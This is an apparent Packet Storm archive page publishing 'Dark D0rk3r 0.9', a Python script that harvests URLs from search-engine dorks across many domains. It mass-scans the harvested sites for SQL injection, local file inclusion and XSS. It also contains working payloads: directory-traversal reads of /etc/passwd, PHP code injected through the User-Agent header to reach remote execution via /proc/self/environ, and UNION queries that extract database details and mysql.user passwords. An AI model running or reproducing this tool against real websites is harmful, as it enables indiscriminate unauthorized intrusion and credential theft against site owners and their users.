exploit the possibilities

Dark D0rk3r 0.9

Dark D0rk3r 0.9
Posted Oct 11, 2012
Authored by baltazar

Dark D0rk3r is a python script that performs dork searching and scans the results for local file inclusion, SQL injection, and cross-site scripting flaws.

Changes: Various updates.
tags | tool, local, scanner, sql injection, python, file inclusion
systems | unix
MD5 | 8fcb9c9d36b9c64d0c3398581ffc690c

Dark D0rk3r 0.9

Change Mirror Download
#!/usr/bin/python
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname : darkd0rk3r.py
# Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version : 0.9
# greetz for all members of ex darkc0de.com, ljuska.org
#

import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess
from random import choice

# ANSI escape sequences used to colour console output.
W = "\033[0m"   # reset (white)
R = "\033[31m"  # red
G = "\033[32m"  # green
O = "\033[33m"  # orange/yellow
B = "\033[34m"  # blue


# Banner
def logo():
print R+"\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 08/2012 darkd0rk3r.py v.0.9 |"
print "| b4ltazar.us |"
print "| |"
print "|---------------------------------------------------------------|\n"
print W

# Clear the screen and show the banner on startup.
# BUG FIX: on Python 2 sys.platform embeds the kernel major version
# ("linux2", "linux3", ...); the original exact comparison missed "linux3"
# and fell through to the Windows "cls" branch.  Match the prefix instead.
if sys.platform.startswith('linux'):
    subprocess.call("clear", shell=True)
    logo()
else:
    subprocess.call("cls", shell=True)
    logo()

# Result log files -- opened in append mode so findings accumulate across runs.
log = "darkd0rk3r-sqli.txt"        # SQL injection hits
logfile = open(log, "a")
lfi_log = "darkd0rk3r-lfi.txt"     # local file inclusion hits
lfi_log_file = open(lfi_log, "a")
rce_log = "darkd0rk3r-rce.txt"     # LFI-to-RCE hits
rce_log_file = open(rce_log, "a")
xss_log = "darkd0rk3r-xss.txt"     # cross-site scripting hits
xss_log_file = open(xss_log, "a")

# Shared mutable state used by the worker threads and the menu loop below.
threads = []    # running worker threads
finallist = []  # deduplicated candidate URLs collected by search()
vuln = []       # every vulnerable URL found in the current scan
col = []        # SQLi-positive URLs fed to the column finder (menu option 2)
darkurl = []    # union-based SQLi template URLs built by menu option 2
arg_end = "--"  # SQL comment terminator appended to injection URLs
arg_eva = "+"   # URL-encoded space used in hand-built injection URLs
colMax = 15 # Change this at your will
gets = 0        # running count of HTTP requests issued by options 2 and 3
# NOTE(review): `file` shadows the Python 2 builtin of the same name; it is
# referenced later (menu option 3), so it is left unrenamed here.
file = "/etc/passwd"
timeout = 300
# Apply the timeout to every socket urllib2 opens from here on.
socket.setdefaulttimeout(timeout)


# LFI payloads: /etc/passwd at increasing directory-traversal depths, first
# with a trailing null byte (defeats suffix appending on old PHP), then plain.
_depths = range(1, 14)
lfis = (["/etc/passwd%00"]
        + ["../" * d + "etc/passwd%00" for d in _depths]
        + ["/etc/passwd"]
        + ["../" * d + "etc/passwd" for d in _depths])

# Reflected-XSS probes: a plain and a URL-encoded variant of the same marker.
xsses = ["<h1>XSS by baltazar</h1>", "%3Ch1%3EXSS%20by%20baltazar%3C/h1%3E"]

# Database error signatures searched for in responses (key = label shown to
# the user, value = substring/regex matched against the page source).
sqlerrors = {
    # MySQL
    'MySQL': 'error in your SQL syntax',
    'MiscError': 'mysql_fetch',
    'MiscError2': 'num_rows',
    # Oracle
    'Oracle': 'ORA-01756',
    # JDBC / ColdFusion
    'JDBC_CFM': 'Error Executing Database Query',
    'JDBC_CFM2': 'SQLServer JDBC Driver',
    # Microsoft SQL Server / Access
    'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
    'MSSQL_Uqm': 'Unclosed quotation mark',
    'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
    'MS-Access_JETdb': 'Microsoft JET Database',
    # Generic server-side error strings (label identical to the signature)
    'Error Occurred While Processing Request': 'Error Occurred While Processing Request',
    'Server Error': 'Server Error',
    'Microsoft OLE DB Provider for ODBC Drivers error': 'Microsoft OLE DB Provider for ODBC Drivers error',
    'Invalid Querystring': 'Invalid Querystring',
    'OLE DB Provider for ODBC': 'OLE DB Provider for ODBC',
    'VBScript Runtime': 'VBScript Runtime',
    'ADODB.Field': 'ADODB.Field',
    'BOF or EOF': 'BOF or EOF',
    'ADODB.Command': 'ADODB.Command',
    'JET Database': 'JET Database',
    'mysql_fetch_array()': 'mysql_fetch_array()',
    'Syntax error': 'Syntax error',
    'mysql_numrows()': 'mysql_numrows()',
    'GetArray()': 'GetArray()',
    'FetchRow()': 'FetchRow()',
    'Input string was not in a correct format': 'Input string was not in a correct format',
}


# Pool of User-Agent strings; search() picks one at random per request so the
# traffic looks less like a single automated client.
header = [
    'Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
    'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
    'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
    'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
    'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
    'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
    'Microsoft Internet Explorer/4.0b1 (Windows 95)',
    'Opera/8.00 (Windows NT 5.1; U; en)',
    'amaya/9.51 libwww/5.4.0',
    'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
    'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
    'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
    'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]',
]


# TLD groups the user can scope the dork search to (menu "Choose your target");
# search() appends "site:<suffix>" to the dork for each entry of the chosen list.
domains = {'All domains':['ac', 'ad', 'ae', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao',
    'aq', 'ar', 'as', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb',
    'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'bj', 'bm', 'bn', 'bo',
    'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cc', 'cd',
    'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'cr',
    'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do',
    'dz', 'ec', 'ee', 'eg', 'eh', 'er', 'es', 'et', 'eu', 'fi',
    'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf',
    'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gp', 'gq', 'gr', 'gs',
    'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu',
    'id', 'ie', 'il', 'im', 'in', 'io', 'iq', 'ir', 'is', 'it',
    'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn',
    'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk',
    'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me',
    'mg', 'mh', 'mk', 'ml', 'mm', 'mn', 'mo', 'mp', 'mq', 'mr',
    'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'na', 'nc',
    'ne', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz',
    'om', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn',
    'pr', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'rs', 'ru',
    'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si', 'sj',
    'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy',
    'sz', 'tc', 'td', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm',
    'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw', 'tz', 'ua', 'ug',
    'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi',
    'vn', 'vu', 'wf', 'ws', 'ye', 'yt', 'za', 'zm', 'zw', 'com',
    'net', 'org','biz', 'gov', 'mil', 'edu', 'info', 'int', 'tel',
    'name', 'aero', 'asia', 'cat', 'coop', 'jobs', 'mobi', 'museum',
    'pro', 'travel'],'Balcan':['al', 'bg', 'ro', 'gr', 'rs', 'hr',
    'tr', 'ba', 'mk', 'mv', 'me'],'TLD':['xxx','edu', 'gov', 'mil',
    'biz', 'cat', 'com', 'int','net', 'org', 'pro', 'tel', 'aero', 'asia',
    'coop', 'info', 'jobs', 'mobi', 'name', 'museum', 'travel']}




def search(inurl, maxc):
    """Run the dork against search-results.com and collect candidate URLs.

    inurl -- the dork string entered by the user
    maxc  -- number of result pages to fetch per site suffix (numeric string)

    Iterates over the module-level `sitearray` (the TLD list chosen in the
    menu), scrapes every href from each result page, filters out noise, then
    keeps at most one URL per hostname -- and only URLs containing a query
    parameter ("=") -- in the module-level `finallist`, which is returned.
    """
    urls = []
    for site in sitearray:
        page = 0
        try:
            while page < int(maxc):
                jar = cookielib.FileCookieJar("cookies")
                query = inurl+"+site:"+site
                results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(page)+'&src=hmp'
                request_web = urllib2.Request(results_web)
                # Random User-Agent per request to look less like a bot.
                agent = random.choice(header)
                request_web.add_header('User-Agent', agent)
                opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
                text = opener_web.open(request_web).read()
                # Extract every href="..." value from the result page.
                stringreg = re.compile('(?<=href=")(.*?)(?=")')
                names = stringreg.findall(text)
                page += 1
                for name in names:
                    if name not in urls:
                        # Drop relative links, markup fragments, and URLs that
                        # start with a digit after the scheme.
                        if re.search(r'\(',name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
                            pass
                        # Drop well-known sites that are never scan targets.
                        elif re.search("google",name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack",name) or re.search("phpbuilder",name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("%", name) or re.search("facebook", name) or re.search("twitter", name):
                            pass
                        else:
                            urls.append(name)
                # Progress line, rewritten in place via \r.
                percent = int((1.0*page/int(maxc))*100)
                urls_len = len(urls)
                sys.stdout.write("\rSite: %s | Collected urls: %s | Percent Done: %s | Current page no.: %s <> " % (site,repr(urls_len),repr(percent),repr(page)))
                sys.stdout.flush()
        except(KeyboardInterrupt):
            # Ctrl-C skips the rest of this site's pages, not the whole search.
            pass
    tmplist = []
    print "\n\n[+] URLS (unsorted): ",len(urls)
    for url in urls:
        try:
            # host[2] is the hostname of "scheme://host/rest"; keep one URL
            # per hostname, and only URLs that carry a query parameter.
            host = url.split("/",3)
            domain = host[2]
            if domain not in tmplist and "=" in url:
                finallist.append(url)
                tmplist.append(domain)
        except:
            # Malformed URL with no hostname part -- skip it.
            pass
    print "[+] URLS (sorted) : ",len(finallist)
    return finallist


class injThread(threading.Thread):
    """Worker thread that runs the SQL-injection probe over a URL slice."""

    def __init__(self, hosts):
        threading.Thread.__init__(self)
        self.hosts = hosts    # slice of URLs assigned to this worker
        self.fcount = 0       # number of URLs processed so far
        self.check = True     # cleared by stop() to abort early

    def run(self):
        for target in list(self.hosts):
            try:
                if not self.check:
                    break
                ClassicINJ(target)
            except (KeyboardInterrupt, ValueError):
                pass
            self.fcount += 1

    def stop(self):
        """Ask the worker to stop before processing its next URL."""
        self.check = False

class lfiThread(threading.Thread):
    """Worker thread that runs the LFI/RCE probe over a URL slice."""

    def __init__(self, hosts):
        threading.Thread.__init__(self)
        self.hosts = hosts    # slice of URLs assigned to this worker
        self.fcount = 0       # number of URLs processed so far
        self.check = True     # cleared by stop() to abort early

    def run(self):
        for target in list(self.hosts):
            try:
                if not self.check:
                    break
                ClassicLFI(target)
            except (KeyboardInterrupt, ValueError):
                pass
            self.fcount += 1

    def stop(self):
        """Ask the worker to stop before processing its next URL."""
        self.check = False

class xssThread(threading.Thread):
    """Worker thread that runs the XSS probe over a URL slice."""

    def __init__(self, hosts):
        threading.Thread.__init__(self)
        self.hosts = hosts    # slice of URLs assigned to this worker
        self.fcount = 0       # number of URLs processed so far
        self.check = True     # cleared by stop() to abort early

    def run(self):
        for target in list(self.hosts):
            try:
                if not self.check:
                    break
                ClassicXSS(target)
            except (KeyboardInterrupt, ValueError):
                pass
            self.fcount += 1

    def stop(self):
        """Ask the worker to stop before processing its next URL."""
        self.check = False


def ClassicINJ(url):
    """Append a single quote to *url* and look for database error strings.

    A signature match means the parameter is probably injectable: the hit is
    printed, appended to the SQLi log file and to the shared `vuln` list, and
    to `col`, which feeds the column finder (menu option 2).
    """
    EXT = "'"
    host = url+EXT
    try:
        source = urllib2.urlopen(host).read()
        # NOTE(review): `type` shadows the builtin of the same name; harmless
        # inside this function but worth renaming at some point.
        for type,eMSG in sqlerrors.items():
            if re.search(eMSG, source):
                print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found"
                logfile.write("\n"+host)
                vuln.append(host)
                col.append(host)
                # One signature match is enough; stop checking the rest.
                break
            else:
                pass
    except:
        # Best-effort probe: any network/HTTP error just skips this URL.
        pass


def ClassicLFI(url):
lfiurl = url.rsplit('=', 1)[0]
if lfiurl[-1] != "=":
lfiurl = lfiurl + "="
for lfi in lfis:
try:
check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read()
if re.findall("root:x", check):
print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found"
lfi_log_file.write("\n"+lfiurl+lfi)
vuln.append(lfiurl+lfi)
target = lfiurl+lfi
target = target.replace("/etc/passwd","/proc/self/environ")
header = "<? echo md5(baltazar); ?>"
try:
request_web = urllib2.Request(target)
request_web.add_header('User-Agent', header)
text = urllib2.urlopen(request_web)
text = text.read()
if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text):
print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found"
rce_log_file.write("\n",target)
vuln.append(target)
except:
pass

except:
pass

def ClassicXSS(url):
    """Append each XSS probe to *url* and check whether it is reflected.

    Reflection of the literal marker in the response suggests -- but does not
    prove -- a cross-site scripting flaw, hence the "might be false" wording.
    Hits are printed, logged, and appended to the shared `vuln` list.
    """
    for xss in xsses:
        try:
            source = urllib2.urlopen(url+xss.replace("\n","")).read()
            if re.findall("XSS by baltazar", source):
                print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)"
                xss_log_file.write("\n"+url+xss)
                vuln.append(url+xss)
        except:
            # Best-effort probe: ignore fetch errors and try the next payload.
            pass

def injtest():
print B+"\n[+] Preparing for SQLi scanning ..."
print "[+] Can take a while ..."
print "[!] Working ...\n"
i = len(usearch) / int(numthreads)
m = len(usearch) % int(numthreads)
z = 0
if len(threads) <= numthreads:
for x in range(0, int(numthreads)):
sliced = usearch[x*i:(x+1)*i]
if (z<m):
sliced.append(usearch[int(numthreads)*i+z])
z +=1
thread = injThread(sliced)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()

def lfitest():
print B+"\n[+] Preparing for LFI - RCE scanning ..."
print "[+] Can take a while ..."
print "[!] Working ...\n"
i = len(usearch) / int(numthreads)
m = len(usearch) % int(numthreads)
z = 0
if len(threads) <= numthreads:
for x in range(0, int(numthreads)):
sliced = usearch[x*i:(x+1)*i]
if (z<m):
sliced.append(usearch[int(numthreads)*i+z])
z +=1
thread = lfiThread(sliced)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()

def xsstest():
print B+"\n[+] Preparing for XSS scanning ..."
print "[+] Can take a while ..."
print "[!] Working ...\n"
i = len(usearch) / int(numthreads)
m = len(usearch) % int(numthreads)
z = 0
if len(threads) <= numthreads:
for x in range(0, int(numthreads)):
sliced = usearch[x*i:(x+1)*i]
if (z<m):
sliced.append(usearch[int(numthreads)*i+z])
z +=1
thread = xssThread(sliced)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()

# ---------------------------------------------------------------------------
# Interactive menu loop.  `new == 1` forces a fresh dork search (and resets
# all shared state); afterwards the menu is re-shown until option 0 exits.
# NOTE(review): indentation below is reconstructed; the published copy of this
# script had its whitespace stripped.
# ---------------------------------------------------------------------------
menu = True
new = 1
while menu == True:
    if new == 1:
        # Reset all shared state from any previous scan.
        threads = []
        finallist = []
        vuln = []
        col = []
        darkurl = []

        # Let the user pick a TLD group to scope the dork search.
        stecnt = 0
        for k,v in domains.items():
            stecnt += 1
            print str(stecnt)+" - "+k
        sitekey = raw_input("\nChoose your target : ")
        # Index into the same (unordered) key sequence just printed.
        sitearray = domains[domains.keys()[int(sitekey)-1]]

        inurl = raw_input('\nEnter your dork : ')
        numthreads = raw_input('Enter no. of threads : ')
        maxc = raw_input('Enter no. of pages : ')
        print "\nNumber of SQL errors :",len(sqlerrors)
        print "Number of LFI paths :",len(lfis)
        print "Number of XSS cheats :",len(xsses)
        print "Number of headers :",len(header)
        print "Number of threads :",numthreads
        print "Number of pages :",maxc
        print "Timeout in seconds :",timeout
        print ""

        usearch = search(inurl,maxc)
        new = 0

    # Main menu, re-printed on every pass.
    print R+"\n[0] Exit"
    print "[1] SQLi Testing"
    print "[2] SQLi Testing with Column Finder"
    print "[3] Retrieve version, user, database (only after option [2])"
    print "[4] LFI - RCE Testing"
    print "[5] XSS Testing"
    print "[6] SQLi and LFI - RCE Testing"
    print "[7] SQLi and XSS Testing"
    print "[8] LFI - RCE and XSS Testing"
    print "[9] SQLi,LFI - RCE and XSS Testing"
    print "[10] Save valid urls to file"
    print "[11] Print valid urls"
    print "[12] Found vuln in last scan"
    print "[13] New Scan\n"

    chce = raw_input(":")
    if chce == '1':
        injtest()

    if chce == '2':
        # SQLi scan first, then brute-force the UNION column count for every
        # URL that produced a database error (collected in `col`).
        injtest()
        print B+"\n[+] Preparing for Column Finder ..."
        print "[+] Can take a while ..."
        print "[!] Working ..."
        # Thanks rsauron for schemafuzz
        for host in col:
            print R+"\n[+] Target: ", O+host
            print R+"[+] Attempting to find the number of columns ..."
            print "[+] Testing: ",
            checkfor = []
            # Drop the trailing quote ClassicINJ appended.
            host = host.rsplit("'", 1)[0]
            sitenew = host+arg_eva+"and"+arg_eva+"1=2"+arg_eva+"union"+arg_eva+"all"+arg_eva+"select"+arg_eva
            makepretty = ""
            for x in xrange(0, colMax):
                try:
                    sys.stdout.write("%s," % (x))
                    sys.stdout.flush()
                    # Add one more hex-encoded "darkXc0de" marker column per pass;
                    # if a marker is reflected, that column count is right.
                    darkc0de = "dark"+str(x)+"c0de"
                    checkfor.append(darkc0de)
                    if x > 0:
                        sitenew += ","
                    sitenew += "0x"+darkc0de.encode("hex")
                    finalurl = sitenew+arg_end
                    gets += 1
                    source = urllib2.urlopen(finalurl).read()
                    for y in checkfor:
                        colFound = re.findall(y, source)
                        if len(colFound) >= 1:
                            print "\n[+] Column length is:", len(checkfor)
                            # The digit inside the reflected marker is the
                            # printable (null) column number.
                            nullcol = re.findall(("\d+"), y)
                            print "[+] Found null column at column #:", nullcol[0]
                            for z in xrange(0, len(checkfor)):
                                if z > 0:
                                    makepretty += ","
                                makepretty += str(z)
                            site = host+arg_eva+"and"+arg_eva+"1=2"+arg_eva+"union"+arg_eva+"all"+arg_eva+"select"+arg_eva+makepretty
                            print "[+] SQLi URL:", site+arg_end
                            # Substitute "darkc0de" at the null column to build
                            # the template URL option 3 consumes.
                            site = site.replace(","+nullcol[0]+",",",darkc0de,")
                            site = site.replace(arg_eva+nullcol[0]+",",arg_eva+"darkc0de,")
                            site = site.replace(","+nullcol[0],",darkc0de")
                            print "[+] darkc0de URL:", site
                            darkurl.append(site)
                            print "[-] Done!\n"
                            break

                except(KeyboardInterrupt, SystemExit):
                    raise
                except:
                    pass

            # NOTE(review): printed even when a column count was found above;
            # the original loop has no success flag.
            print "\n[!] Sorry column length could not be found\n"
    ###########

    if chce == '3':
        # Use the darkc0de template URLs from option 2 to pull server info.
        print B+"\n[+] Gathering MySQL Server Configuration..."
        for site in darkurl:
            # 0x1e (record separator) delimits the injected values.
            head_URL = site.replace("darkc0de", "concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
            print R+"\n[+] Target:", O+site
            while 1:
                try:
                    gets += 1
                    source = urllib2.urlopen(head_URL).read()
                    match = re.findall("\x1e\x1e\S+", source)
                    if len(match) >= 1:
                        match = match[0][2:].split("\x1e")
                        version = match[0]
                        user = match[1]
                        database = match[2]
                        print W+"\n\tDatabase:", database
                        print "\tUser:", user
                        print "\tVersion:", version
                        # Keep only the major version digit.
                        version = version[0]
                        #break

                        # Check FILE privilege by reading /etc/passwd
                        # (0x2f6574632f706173737764 is its hex encoding).
                        load = site.replace("darkc0de", "load_file(0x2f6574632f706173737764)")
                        source = urllib2.urlopen(load).read()
                        if re.findall("root:x", source):
                            # 0x62616c74617a6172 == "baltazar", used as a marker.
                            load = site.replace("darkc0de","concat_ws(char(58),load_file(0x"+file.encode("hex")+"),0x62616c74617a6172)")
                            source = urllib2.urlopen(load).read()
                            # NOTE(review): `search` shadows the search() function here.
                            search = re.findall("baltazar",source)
                            if len(search) > 0:
                                print "\n[!] w00t!w00t!: "+site.replace("darkc0de", "load_file(0x"+file.encode("hex")+")")

                            # NOTE(review): "dakrc0de" below is a typo for
                            # "darkc0de" -- this replace never matches, so the
                            # mysql.user dump request is sent unmodified.
                            load = site.replace("dakrc0de", "concat_ws(char(58),user,password,0x62616c74617a6172)")+arg_eva+"from"+arg_eva+"mysql.user"
                            source = urllib2.urlopen(load).read()
                            if re.findall("baltazar", source):
                                print "\n[!] w00t!w00t!: "+site.replace("darkc0de", "concat_ws(char(58),user,password)")+arg_eva+"from"+arg_eva+"mysql.user"
                        break

                    else:
                        print "[-] No Data Found"
                        break

                except(KeyboardInterrupt, SystemExit):
                    raise

    if chce == '4':
        lfitest()

    if chce == '5':
        xsstest()

    if chce == '6':
        injtest()
        lfitest()

    if chce == '7':
        injtest()
        xsstest()

    if chce == '8':
        lfitest()
        xsstest()

    if chce == '9':
        injtest()
        lfitest()
        xsstest()

    if chce == '10':
        # Dump the deduplicated URL list to a user-chosen file.
        print B+"\nSaving valid urls ("+str(len(finallist))+") to file"
        listname = raw_input("Filename: ")
        list_name = open(listname, "w")
        finallist.sort()
        for t in finallist:
            list_name.write(t+"\n")
        list_name.close()
        print "Urls saved, please check", listname

    if chce == '11':
        print W+"\nPrinting valid urls:\n"
        finallist.sort()
        for t in finallist:
            print B+t

    if chce == '12':
        print B+"\nVuln found ",len(vuln)

    if chce == '13':
        # Trigger a fresh search on the next loop pass.
        new = 1
        print W+""

    if chce == '0':
        print R+"\n[-] Exiting ..."
        # NOTE(review): `mnu` looks like a typo for `menu`; harmless, since
        # sys.exit() below terminates the loop anyway.
        mnu = False
        print W
        sys.exit(1)



Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close